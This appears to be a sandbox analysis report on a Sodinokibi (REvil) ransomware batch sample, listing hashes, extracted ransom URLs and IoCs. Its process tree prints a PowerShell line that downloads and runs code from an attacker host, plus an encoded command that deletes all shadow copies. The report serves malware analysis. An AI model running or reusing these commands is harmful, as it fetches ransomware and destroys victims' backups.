Analysis
  max time kernel: 138s
  max time network: 158s
  platform: windows7_x64
  resource: win7v200430
  submitted: 20-05-2020 23:10
Static task: static1
Behavioral task: behavioral1
  Sample: 4f6a42934f34216c6420c04766ae463c.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 4f6a42934f34216c6420c04766ae463c.bat
  Resource: win10v200430
General
  Target: 4f6a42934f34216c6420c04766ae463c.bat
  Size: 218B
  MD5: d7072273beb15bc6b69f0d896b3c3a67
  SHA1: 252dfb1b0b89545b3b431bfde9c616a85236b34d
  SHA256: 172b87c827469bb03962118ed3294645fa65025b5ed9de5157c0f7d5b4ebef27
  SHA512: cf89e740f3547dde583dec727b45569f2c3a5d072f01420d64f6bb6651e54dd8c3a3bac098f3fa59f61311e99d65fbde23c1d96562274e1943dc9b28ca69cfdc
Malware Config
Extracted
  http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c
Extracted
  C:\9zc68-read-me.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/045690A9772B7A5B
  http://decryptor.cc/045690A9772B7A5B
Signatures

Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
  pid | process
  1292 | powershell.exe
  1292 | powershell.exe
  1292 | powershell.exe
  784 | powershell.exe
  784 | powershell.exe
  1292 | powershell.exe (every remaining listed entry is the same)
Modifies system certificate store
Processes: powershell.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | powershell.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | powershell.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | powershell.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = … | powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Drops file in Program Files directory (16 IoCs)
Processes: powershell.exe
  description | ioc | process
  File created | \??\c:\program files\9zc68-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\EnableCompress.eps | powershell.exe
  File opened for modification | \??\c:\program files\StartConfirm.htm | powershell.exe
  File opened for modification | \??\c:\program files\SyncGrant.mpeg | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9zc68-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\OutRegister.potx | powershell.exe
  File opened for modification | \??\c:\program files\RedoUpdate.ppt | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\9zc68-read-me.txt | powershell.exe
  File created | \??\c:\program files (x86)\9zc68-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\NewResume.vdx | powershell.exe
  File opened for modification | \??\c:\program files\SaveOut.scf | powershell.exe
  File opened for modification | \??\c:\program files\LimitRestore.xlt | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\9zc68-read-me.txt | powershell.exe
  File opened for modification | \??\c:\program files\SubmitRestart.emz | powershell.exe
  File opened for modification | \??\c:\program files\TraceLock.mov | powershell.exe
  File opened for modification | \??\c:\program files\UnpublishGroup.emz | powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t8b2qoc25y881.bmp" | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: powershell.exe
  pid | process
  1292 | powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 888 wrote to memory of 1292 | 888 | cmd.exe | powershell.exe
  PID 1292 wrote to memory of 784 | 1292 | powershell.exe | powershell.exe
  PID 1292 wrote to memory of 784 | 1292 | powershell.exe | powershell.exe
  PID 1292 wrote to memory of 784 | 1292 | powershell.exe | powershell.exe
  PID 1292 wrote to memory of 784 | 1292 | powershell.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1292 | powershell.exe
  Token: SeDebugPrivilege | 1292 | powershell.exe
  Token: SeDebugPrivilege | 784 | powershell.exe
  Token: SeBackupPrivilege | 1788 | vssvc.exe
  Token: SeRestorePrivilege | 1788 | vssvc.exe
  Token: SeAuditPrivilege | 1788 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1292 | powershell.exe
Blacklisted process makes network request (178 IoCs)
Processes: powershell.exe
  flow | pid | process
  1, 5, 7, 9, 11, 12, 14, 16, 18, 19, 21, 22, 24, 25, 27, 28, 30, 31, 33, 35, 36, 38, 40, 42, 44, 46, 47, 49, 50, 52, 53, 56, 58, 60, 62, 63, 65, 66, 68, 69, 71, 73, 75, 77, 79, 80, 82, 84, 86, 87, 89, 92, 93, 95, 96, 98, 99, 101, 103, 105, 106, 108, 110, 111 | 1292 | powershell.exe
  (each listed flow is a separate entry; all of them belong to pid 1292 powershell.exe)
Drops file in System32 directory (1 IoCs)
Processes: powershell.exe
  description | ioc | process
  File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\4f6a42934f34216c6420c04766ae463c.bat"
  PID: 888
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c');Invoke-EPKZRFQOIDB;Start-Sleep -s 10000"
    PID: 1292
    - Suspicious behavior: EnumeratesProcesses
    - Modifies system certificate store
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Blacklisted process makes network request
    - Drops file in System32 directory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies, which is what triggers the vssvc.exe activity below)
      PID: 784
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1788
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken